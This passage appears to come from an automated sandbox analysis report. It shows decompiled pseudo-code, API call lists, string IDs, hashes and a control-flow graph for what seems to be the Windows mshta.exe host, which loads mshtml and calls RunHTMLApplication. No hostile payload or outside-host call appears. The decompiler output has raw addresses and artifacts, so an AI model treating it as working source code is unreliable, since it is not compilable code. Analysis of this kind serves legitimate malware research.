                                                                                                                                                                                              							_t84 = LoadLibraryA(_t83); // executed
                                                                                                                                                                                              							_t152 = _t84;
                                                                                                                                                                                              							_push(_t148);
                                                                                                                                                                                              							_v28 = _t152;
                                                                                                                                                                                              							L00B317F9();
                                                                                                                                                                                              							_push(_t116);
                                                                                                                                                                                              							L00B317F9();
                                                                                                                                                                                              							_t116 = 0;
                                                                                                                                                                                              							_t148 = 0;
                                                                                                                                                                                              							if(_v12 != 0xffffffff) {
                                                                                                                                                                                              								RegCloseKey(_v12); // executed
                                                                                                                                                                                              								_v12 = _v12 | 0xffffffff;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t85 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                                                                                              							if(_t85 == 0) {
                                                                                                                                                                                              								L42:
                                                                                                                                                                                              								if(_t152 == 0) {
                                                                                                                                                                                              									goto L52;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t86 = GetProcAddress(_t152, "RunHTMLApplication");
                                                                                                                                                                                              								_v36 = _t86;
                                                                                                                                                                                              								if(_t86 != 0) {
                                                                                                                                                                                              									 *0xb340cc(_a4, _a8, _a12, _a16); // executed
                                                                                                                                                                                              									_v36();
                                                                                                                                                                                              									if(_t158 != _t158) {
                                                                                                                                                                                              										asm("int 0x29");
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t152 = _v28;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								FreeLibrary(_t152);
                                                                                                                                                                                              								goto L48;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t90 = GetProcAddress(_t85, "RegisterApplicationRestart");
                                                                                                                                                                                              								_v16 = _t90;
                                                                                                                                                                                              								if(_t90 == 0) {
                                                                                                                                                                                              									goto L42;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t125 = _a12;
                                                                                                                                                                                              								_t145 = _t125 + 1;
                                                                                                                                                                                              								do {
                                                                                                                                                                                              									_t91 =  *_t125;
                                                                                                                                                                                              									_t125 = _t125 + 1;
                                                                                                                                                                                              									_t190 = _t91;
                                                                                                                                                                                              								} while (_t91 != 0);
                                                                                                                                                                                              								_t146 = 2;
                                                                                                                                                                                              								_v36 = _t125 - _t145 + 1;
                                                                                                                                                                                              								_t94 = E00B317D0( ~(0 | _t190 > 0x00000000) | (_t125 - _t145 + 0x00000001) * _t146);
                                                                                                                                                                                              								_v24 = _t94;
                                                                                                                                                                                              								if(_t94 != 0) {
                                                                                                                                                                                              									if(MultiByteToWideChar(0, 0, _a12, 0xffffffff, _t94, _v36) > 0) {
                                                                                                                                                                                              										 *0xb340cc(_v24, 0); // executed
                                                                                                                                                                                              										_v16();
                                                                                                                                                                                              										if(_t158 != _t158) {
                                                                                                                                                                                              											asm("int 0x29");
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_t152 = _v28;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_push(_v24);
                                                                                                                                                                                              									L00B317F9();
                                                                                                                                                                                              								}
                                                                                                                                                                                              								goto L42;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(ExpandEnvironmentStringsA(_t148, _t116, 0x105) == 0) {
                                                                                                                                                                                              							goto L48;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t83 = _t116;
                                                                                                                                                                                              						if(_v20 == 0) {
                                                                                                                                                                                              							goto L30;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L29;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t110 =  &_v16;
                                                                                                                                                                                              					_v16 = 0;
                                                                                                                                                                                              					__imp__rand_s(_t110);
                                                                                                                                                                                              					if(_t110 != 0) {
                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t157 = 0;
                                                                                                                                                                                              					_t112 = (_v16 & 0x000000ff) + 1;
                                                                                                                                                                                              					_v16 = _t112;
                                                                                                                                                                                              					if(_t112 == 0) {
                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						goto L8;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						L8:
                                                                                                                                                                                              						VirtualAlloc(0, 0x10000, 0x2000, 1);
                                                                                                                                                                                              						_t157 = _t157 + 1;
                                                                                                                                                                                              					} while (_t157 < _v16);
                                                                                                                                                                                              					goto L9;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}











































                                                                                                                                                                                              0x00b31468
                                                                                                                                                                                              0x00b3147e
                                                                                                                                                                                              0x00b31486
                                                                                                                                                                                              0x00b3148f
                                                                                                                                                                                              0x00b3148f
                                                                                                                                                                                              0x00b31495
                                                                                                                                                                                              0x00b3149c
                                                                                                                                                                                              0x00b314a3
                                                                                                                                                                                              0x00b314f0
                                                                                                                                                                                              0x00b314f0
                                                                                                                                                                                              0x00b314f8
                                                                                                                                                                                              0x00b31503
                                                                                                                                                                                              0x00b3150b
                                                                                                                                                                                              0x00b31519
                                                                                                                                                                                              0x00b3151d
                                                                                                                                                                                              0x00b31528
                                                                                                                                                                                              0x00b3152e
                                                                                                                                                                                              0x00b31532
                                                                                                                                                                                              0x00b31539
                                                                                                                                                                                              0x00b31539
                                                                                                                                                                                              0x00b31532
                                                                                                                                                                                              0x00b3151d
                                                                                                                                                                                              0x00b3150b
                                                                                                                                                                                              0x00b3153b
                                                                                                                                                                                              0x00b31545
                                                                                                                                                                                              0x00b3154e
                                                                                                                                                                                              0x00b31550
                                                                                                                                                                                              0x00b31555
                                                                                                                                                                                              0x00b31559
                                                                                                                                                                                              0x00b3155f
                                                                                                                                                                                              0x00b31770
                                                                                                                                                                                              0x00b31772
                                                                                                                                                                                              0x00b31774
                                                                                                                                                                                              0x00b31775
                                                                                                                                                                                              0x00b3177a
                                                                                                                                                                                              0x00b3177b
                                                                                                                                                                                              0x00b3177f
                                                                                                                                                                                              0x00b31784
                                                                                                                                                                                              0x00b31784
                                                                                                                                                                                              0x00b31792
                                                                                                                                                                                              0x00b31792
                                                                                                                                                                                              0x00b31567
                                                                                                                                                                                              0x00b31765
                                                                                                                                                                                              0x00b31767
                                                                                                                                                                                              0x00b31769
                                                                                                                                                                                              0x00b3176a
                                                                                                                                                                                              0x00b3176f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b31767
                                                                                                                                                                                              0x00b31572
                                                                                                                                                                                              0x00b31578
                                                                                                                                                                                              0x00b3157d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b31589
                                                                                                                                                                                              0x00b3158f
                                                                                                                                                                                              0x00b31594
                                                                                                                                                                                              0x00b3159b
                                                                                                                                                                                              0x00b3159e
                                                                                                                                                                                              0x00b315a4
                                                                                                                                                                                              0x00b315a7
                                                                                                                                                                                              0x00b315b4
                                                                                                                                                                                              0x00b315ba
                                                                                                                                                                                              0x00b315bf
                                                                                                                                                                                              0x00b315c6
                                                                                                                                                                                              0x00b315c6
                                                                                                                                                                                              0x00b315ca
                                                                                                                                                                                              0x00b315de
                                                                                                                                                                                              0x00b315de
                                                                                                                                                                                              0x00b315ca
                                                                                                                                                                                              0x00b315e4
                                                                                                                                                                                              0x00b315ee
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b315f4
                                                                                                                                                                                              0x00b31607
                                                                                                                                                                                              0x00b3160f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b31623
                                                                                                                                                                                              0x00b3162b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b31631
                                                                                                                                                                                              0x00b31637
                                                                                                                                                                                              0x00b31655
                                                                                                                                                                                              0x00b31655
                                                                                                                                                                                              0x00b31657
                                                                                                                                                                                              0x00b31658
                                                                                                                                                                                              0x00b3165e
                                                                                                                                                                                              0x00b31660
                                                                                                                                                                                              0x00b31661
                                                                                                                                                                                              0x00b31664
                                                                                                                                                                                              0x00b31669
                                                                                                                                                                                              0x00b3166a
                                                                                                                                                                                              0x00b31670
                                                                                                                                                                                              0x00b31672
                                                                                                                                                                                              0x00b31679
                                                                                                                                                                                              0x00b3167e
                                                                                                                                                                                              0x00b31684
                                                                                                                                                                                              0x00b31684
                                                                                                                                                                                              0x00b3168d
                                                                                                                                                                                              0x00b31695
                                                                                                                                                                                              0x00b31720
                                                                                                                                                                                              0x00b31722
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b3172a
                                                                                                                                                                                              0x00b31730
                                                                                                                                                                                              0x00b31735
                                                                                                                                                                                              0x00b31747
                                                                                                                                                                                              0x00b3174d
                                                                                                                                                                                              0x00b31752
                                                                                                                                                                                              0x00b31759
                                                                                                                                                                                              0x00b31759
                                                                                                                                                                                              0x00b3175b
                                                                                                                                                                                              0x00b3175b
                                                                                                                                                                                              0x00b3175f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b3169b
                                                                                                                                                                                              0x00b316a1
                                                                                                                                                                                              0x00b316a7
                                                                                                                                                                                              0x00b316ac
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b316ae
                                                                                                                                                                                              0x00b316b1
                                                                                                                                                                                              0x00b316b4
                                                                                                                                                                                              0x00b316b4
                                                                                                                                                                                              0x00b316b6
                                                                                                                                                                                              0x00b316b7
                                                                                                                                                                                              0x00b316b7
                                                                                                                                                                                              0x00b316bf
                                                                                                                                                                                              0x00b316c5
                                                                                                                                                                                              0x00b316d2
                                                                                                                                                                                              0x00b316d7
                                                                                                                                                                                              0x00b316dd
                                                                                                                                                                                              0x00b316f4
                                                                                                                                                                                              0x00b31700
                                                                                                                                                                                              0x00b31706
                                                                                                                                                                                              0x00b3170b
                                                                                                                                                                                              0x00b31712
                                                                                                                                                                                              0x00b31712
                                                                                                                                                                                              0x00b31714
                                                                                                                                                                                              0x00b31714
                                                                                                                                                                                              0x00b31717
                                                                                                                                                                                              0x00b3171a
                                                                                                                                                                                              0x00b3171f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b316dd
                                                                                                                                                                                              0x00b31695
                                                                                                                                                                                              0x00b31648
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b3164e
                                                                                                                                                                                              0x00b31653
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b31653
                                                                                                                                                                                              0x00b314b7
                                                                                                                                                                                              0x00b314b7
                                                                                                                                                                                              0x00b314ba
                                                                                                                                                                                              0x00b314be
                                                                                                                                                                                              0x00b314c7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b314cd
                                                                                                                                                                                              0x00b314cf
                                                                                                                                                                                              0x00b314d2
                                                                                                                                                                                              0x00b314d5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b314d7
                                                                                                                                                                                              0x00b314d7
                                                                                                                                                                                              0x00b314e4
                                                                                                                                                                                              0x00b314ea
                                                                                                                                                                                              0x00b314eb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b314d7

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • #650.IERTUTIL(00000000,00000001,?,00000004,00000000,00000000,?,00000002,00000000), ref: 00B3147E
                                                                                                                                                                                              • SetProcessDEPPolicy.KERNEL32 ref: 00B3148F
                                                                                                                                                                                              • rand_s.MSVCRT ref: 00B314BE
                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00010000,00002000,00000001), ref: 00B314E4
                                                                                                                                                                                              • GetVersion.KERNEL32(?,00010000,00002000,00000001), ref: 00B314F0
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(Kernel32.dll), ref: 00B31503
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00B31513
                                                                                                                                                                                              • LoadLibraryW.KERNEL32(WLDP.DLL), ref: 00B31572
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WldpGetLockdownPolicy), ref: 00B31589
                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 00B315E4
                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000000,clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32,00000000,00000001,000000FF), ref: 00B31607
                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(000000FF,00000000,00000000,?,00000000,?), ref: 00B31623
                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000105), ref: 00B31640
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000), ref: 00B31658
                                                                                                                                                                                              • RegCloseKey.KERNEL32(000000FF), ref: 00B3167E
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B3168D
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegisterApplicationRestart), ref: 00B316A1
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 00B316EC
                                                                                                                                                                                              • RegisterApplicationRestart.KERNEL32 ref: 00B31706
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RunHTMLApplication), ref: 00B3172A
                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00B3175F
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(000000FF), ref: 00B31784
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.224681367.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.224673548.0000000000B30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.224693826.0000000000B34000.00000002.00020000.sdmp Download File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b30000_ms.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryProc$CloseFreeHandleLoadModule$#650AllocApplicationByteCharEnvironmentExpandMultiOpenPolicyProcessQueryRegisterRestartStringsValueVersionVirtualWiderand_s
                                                                                                                                                                                              • String ID: HeapSetInformation$Kernel32.dll$RegisterApplicationRestart$RunHTMLApplication$WLDP.DLL$WldpGetLockdownPolicy$clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32$kernel32.dll
                                                                                                                                                                                              • API String ID: 3737958553-3560873152
                                                                                                                                                                                              • Opcode ID: 566ae037fd1b460796ee18148ba7cda2062421e3ac066bf994b8229d98e008ad
                                                                                                                                                                                              • Instruction ID: 6360a9a34ff27ebfe82bac6f51adb8aab9b278658606a481a029aa67b217ad5c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 566ae037fd1b460796ee18148ba7cda2062421e3ac066bf994b8229d98e008ad
                                                                                                                                                                                              • Instruction Fuzzy Hash: CB91A875A00205EBDF145FA8EC89BAE7BFDEB04750F3449A9FA11A7290DF349D418B60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 80 b31910-b31941 call b31dc3 call b31e7c GetStartupInfoW 86 b31943-b31952 80->86 87 b31954-b31956 86->87 88 b3196c-b3196e 86->88 89 b31958-b3195d 87->89 90 b3195f-b3196a Sleep 87->90 91 b3196f-b31975 88->91 89->91 90->86 92 b31981-b31987 91->92 93 b31977-b3197f _amsg_exit 91->93 95 b319b5 92->95 96 b31989-b31999 call b31aef 92->96 94 b319bb-b319c1 93->94 97 b319c3-b319d4 _initterm 94->97 98 b319de-b319e0 94->98 95->94 100 b3199e-b319a2 96->100 97->98 101 b319e2-b319e9 98->101 102 b319eb-b319f2 98->102 100->94 103 b319a4-b319b0 100->103 101->102 104 b31a17-b31a21 102->104 105 b319f4-b31a01 call b31cd0 102->105 107 b31ae9-b31aee call b31ec4 103->107 106 b31a24-b31a29 104->106 105->104 116 b31a03-b31a15 105->116 109 b31a75-b31a78 106->109 110 b31a2b-b31a2d 106->110 117 b31a86-b31a93 _ismbblead 109->117 118 b31a7a-b31a83 109->118 113 b31a44-b31a48 110->113 114 b31a2f-b31a31 110->114 122 b31a50-b31a52 113->122 123 b31a4a-b31a4e 113->123 114->109 121 b31a33-b31a35 114->121 116->104 119 b31a95-b31a96 117->119 120 b31a99-b31a9d 117->120 118->117 119->120 120->106 124 b31ace-b31ad5 120->124 121->113 125 b31a37-b31a3a 121->125 126 b31a53-b31a6c call b31460 122->126 123->126 128 b31ae2 124->128 129 b31ad7-b31add _cexit 124->129 125->113 130 b31a3c-b31a42 125->130 126->124 133 b31a6e-b31a6f exit 126->133 128->107 129->128 130->121 133->109
                                                                                                                                                                                              C-Code - Quality: 52%
                                                                                                                                                                                              			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                              				signed int _t26;
                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                              				signed int _t38;
                                                                                                                                                                                              				intOrPtr _t42;
                                                                                                                                                                                              				signed char _t43;
                                                                                                                                                                                              				signed int _t55;
                                                                                                                                                                                              				intOrPtr _t57;
                                                                                                                                                                                              				signed int _t59;
                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                              
                                                                                                                                                                                              				E00B31DC3();
                                                                                                                                                                                              				_push(0x5c);
                                                                                                                                                                                              				_push(0xb320b0);
                                                                                                                                                                                              				E00B31E7C(__ebx, __edi, __esi);
                                                                                                                                                                                              				 *(_t62 - 0x24) = 0;
                                                                                                                                                                                              				GetStartupInfoW(_t62 - 0x6c);
                                                                                                                                                                                              				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                              				_t57 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                              				_t55 = 0;
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					_t42 = _t57;
                                                                                                                                                                                              					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                              					if(0 == 0) {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(0 != _t57) {
                                                                                                                                                                                              						Sleep(0x3e8);
                                                                                                                                                                                              						continue;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t59 = 1;
                                                                                                                                                                                              						_t55 = 1;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L7:
                                                                                                                                                                                              					if( *0xb33410 != _t59) {
                                                                                                                                                                                              						__eflags =  *0xb33410;
                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                              							 *0xb33014 = _t59;
                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							 *0xb33410 = _t59;
                                                                                                                                                                                              							_t38 = E00B31AEF(_t42, 0xb310bc, 0xb310c8); // executed
                                                                                                                                                                                              							__eflags = _t38;
                                                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                                                              								goto L13;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_push(0x1f);
                                                                                                                                                                                              						L00B31C74();
                                                                                                                                                                                              						L13:
                                                                                                                                                                                              						if( *0xb33410 == _t59) {
                                                                                                                                                                                              							_push(0xb310b8);
                                                                                                                                                                                              							_push(0xb310b0);
                                                                                                                                                                                              							L00B31E76();
                                                                                                                                                                                              							 *0xb33410 = 2;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t55 == 0) {
                                                                                                                                                                                              							 *0xb3340c = 0;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t71 =  *0xb33414;
                                                                                                                                                                                              						if( *0xb33414 != 0 && E00B31CD0(_t71, 0xb33414) != 0) {
                                                                                                                                                                                              							 *0xb340cc(0, 2, 0);
                                                                                                                                                                                              							 *((intOrPtr*)( *0xb33414))();
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t59 =  *_acmdln;
                                                                                                                                                                                              						 *(_t62 - 0x20) = _t59;
                                                                                                                                                                                              						_t55 =  *(_t62 - 0x24);
                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                              							_t43 =  *_t59;
                                                                                                                                                                                              							if(_t43 > 0x20) {
                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							if(_t43 != 0) {
                                                                                                                                                                                              								if(_t55 != 0) {
                                                                                                                                                                                              									goto L32;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									while(_t43 != 0 && _t43 <= 0x20) {
                                                                                                                                                                                              										_t59 = _t59 + 1;
                                                                                                                                                                                              										 *(_t62 - 0x20) = _t59;
                                                                                                                                                                                              										_t43 =  *_t59;
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              							__eflags =  *(_t62 - 0x40) & 0x00000001;
                                                                                                                                                                                              							if(( *(_t62 - 0x40) & 0x00000001) == 0) {
                                                                                                                                                                                              								_t29 = 0xa;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t29 =  *(_t62 - 0x3c) & 0x0000ffff;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t30 = E00B31460(0xb30000, 0, _t59, _t29); // executed
                                                                                                                                                                                              							 *0xb33010 = _t30;
                                                                                                                                                                                              							__eflags =  *0xb33028;
                                                                                                                                                                                              							if( *0xb33028 == 0) {
                                                                                                                                                                                              								exit(_t30); // executed
                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							__eflags =  *0xb33014;
                                                                                                                                                                                              							if( *0xb33014 == 0) {
                                                                                                                                                                                              								__imp___cexit();
                                                                                                                                                                                              							}
                                                                                                                                                                                              							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                              							goto L40;
                                                                                                                                                                                              							L32:
                                                                                                                                                                                              							__eflags = _t43 - 0x22;
                                                                                                                                                                                              							if(_t43 == 0x22) {
                                                                                                                                                                                              								__eflags = _t55;
                                                                                                                                                                                              								_t15 = _t55 == 0;
                                                                                                                                                                                              								__eflags = _t15;
                                                                                                                                                                                              								_t55 = 0 | _t15;
                                                                                                                                                                                              								 *(_t62 - 0x24) = _t55;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t26 = _t43 & 0x000000ff;
                                                                                                                                                                                              							__imp___ismbblead(_t26);
                                                                                                                                                                                              							__eflags = _t26;
                                                                                                                                                                                              							if(_t26 != 0) {
                                                                                                                                                                                              								_t59 = _t59 + 1;
                                                                                                                                                                                              								__eflags = _t59;
                                                                                                                                                                                              								 *(_t62 - 0x20) = _t59;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t59 = _t59 + 1;
                                                                                                                                                                                              							 *(_t62 - 0x20) = _t59;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L40:
                                                                                                                                                                                              					return E00B31EC4(0, _t55, _t59);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t59 = 1;
                                                                                                                                                                                              				__eflags = 1;
                                                                                                                                                                                              				goto L7;
                                                                                                                                                                                              			}













                                                                                                                                                                                              0x00b31910
                                                                                                                                                                                              0x00b3191a
                                                                                                                                                                                              0x00b3191c
                                                                                                                                                                                              0x00b31921
                                                                                                                                                                                              0x00b31928
                                                                                                                                                                                              0x00b3192f
                                                                                                                                                                                              0x00b31935
                                                                                                                                                                                              0x00b3193e
                                                                                                                                                                                              0x00b31941
                                                                                                                                                                                              0x00b31943
                                                                                                                                                                                              0x00b31948
                                                                                                                                                                                              0x00b3194c
                                                                                                                                                                                              0x00b31952
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b31956
                                                                                                                                                                                              0x00b31964
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b31958
                                                                                                                                                                                              0x00b3195a
                                                                                                                                                                                              0x00b3195b
                                                                                                                                                                                              0x00b3195b
                                                                                                                                                                                              0x00b3196f
                                                                                                                                                                                              0x00b31975
                                                                                                                                                                                              0x00b31981
                                                                                                                                                                                              0x00b31987
                                                                                                                                                                                              0x00b319b5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b31989
                                                                                                                                                                                              0x00b31989
                                                                                                                                                                                              0x00b31999
                                                                                                                                                                                              0x00b319a0
                                                                                                                                                                                              0x00b319a2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b319a4
                                                                                                                                                                                              0x00b319a4
                                                                                                                                                                                              0x00b319ab
                                                                                                                                                                                              0x00b319a2
                                                                                                                                                                                              0x00b31977
                                                                                                                                                                                              0x00b31977
                                                                                                                                                                                              0x00b31979
                                                                                                                                                                                              0x00b319bb
                                                                                                                                                                                              0x00b319c1
                                                                                                                                                                                              0x00b319c3
                                                                                                                                                                                              0x00b319c8
                                                                                                                                                                                              0x00b319cd
                                                                                                                                                                                              0x00b319d4
                                                                                                                                                                                              0x00b319d4
                                                                                                                                                                                              0x00b319e0
                                                                                                                                                                                              0x00b319e9
                                                                                                                                                                                              0x00b319e9
                                                                                                                                                                                              0x00b319eb
                                                                                                                                                                                              0x00b319f2
                                                                                                                                                                                              0x00b31a0f
                                                                                                                                                                                              0x00b31a15
                                                                                                                                                                                              0x00b31a15
                                                                                                                                                                                              0x00b31a1c
                                                                                                                                                                                              0x00b31a1e
                                                                                                                                                                                              0x00b31a21
                                                                                                                                                                                              0x00b31a24
                                                                                                                                                                                              0x00b31a24
                                                                                                                                                                                              0x00b31a29
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b31a2d
                                                                                                                                                                                              0x00b31a31
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b31a33
                                                                                                                                                                                              0x00b31a3c
                                                                                                                                                                                              0x00b31a3d
                                                                                                                                                                                              0x00b31a40
                                                                                                                                                                                              0x00b31a40
                                                                                                                                                                                              0x00b31a33
                                                                                                                                                                                              0x00b31a31
                                                                                                                                                                                              0x00b31a44
                                                                                                                                                                                              0x00b31a48
                                                                                                                                                                                              0x00b31a52
                                                                                                                                                                                              0x00b31a4a
                                                                                                                                                                                              0x00b31a4a
                                                                                                                                                                                              0x00b31a4a
                                                                                                                                                                                              0x00b31a5b
                                                                                                                                                                                              0x00b31a60
                                                                                                                                                                                              0x00b31a65
                                                                                                                                                                                              0x00b31a6c
                                                                                                                                                                                              0x00b31a6f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b31a6f
                                                                                                                                                                                              0x00b31ace
                                                                                                                                                                                              0x00b31ad5
                                                                                                                                                                                              0x00b31ad7
                                                                                                                                                                                              0x00b31add
                                                                                                                                                                                              0x00b31ae2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00b31a75
                                                                                                                                                                                              0x00b31a75
                                                                                                                                                                                              0x00b31a78
                                                                                                                                                                                              0x00b31a7c
                                                                                                                                                                                              0x00b31a7e
                                                                                                                                                                                              0x00b31a7e
                                                                                                                                                                                              0x00b31a81
                                                                                                                                                                                              0x00b31a83
                                                                                                                                                                                              0x00b31a83
                                                                                                                                                                                              0x00b31a86
                                                                                                                                                                                              0x00b31a8a
                                                                                                                                                                                              0x00b31a91
                                                                                                                                                                                              0x00b31a93
                                                                                                                                                                                              0x00b31a95
                                                                                                                                                                                              0x00b31a95
                                                                                                                                                                                              0x00b31a96
                                                                                                                                                                                              0x00b31a96
                                                                                                                                                                                              0x00b31a99
                                                                                                                                                                                              0x00b31a9a
                                                                                                                                                                                              0x00b31a9a
                                                                                                                                                                                              0x00b31a24
                                                                                                                                                                                              0x00b31ae9
                                                                                                                                                                                              0x00b31aee
                                                                                                                                                                                              0x00b31aee
                                                                                                                                                                                              0x00b3196e
                                                                                                                                                                                              0x00b3196e
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00B31DC3: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00B31DF0
                                                                                                                                                                                                • Part of subcall function 00B31DC3: GetCurrentProcessId.KERNEL32 ref: 00B31DFF
                                                                                                                                                                                                • Part of subcall function 00B31DC3: GetCurrentThreadId.KERNEL32 ref: 00B31E08
                                                                                                                                                                                                • Part of subcall function 00B31DC3: GetTickCount.KERNEL32 ref: 00B31E11
                                                                                                                                                                                                • Part of subcall function 00B31DC3: QueryPerformanceCounter.KERNEL32(?), ref: 00B31E26
                                                                                                                                                                                              • GetStartupInfoW.KERNEL32(?,00B320B0,0000005C), ref: 00B3192F
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 00B31964
                                                                                                                                                                                              • _amsg_exit.MSVCRT ref: 00B31979
                                                                                                                                                                                              • _initterm.MSVCRT ref: 00B319CD
                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00B319F9
                                                                                                                                                                                              • exit.KERNELBASE ref: 00B31A6F
                                                                                                                                                                                              • _ismbblead.MSVCRT ref: 00B31A8A
                                                                                                                                                                                              Memory Dump Source
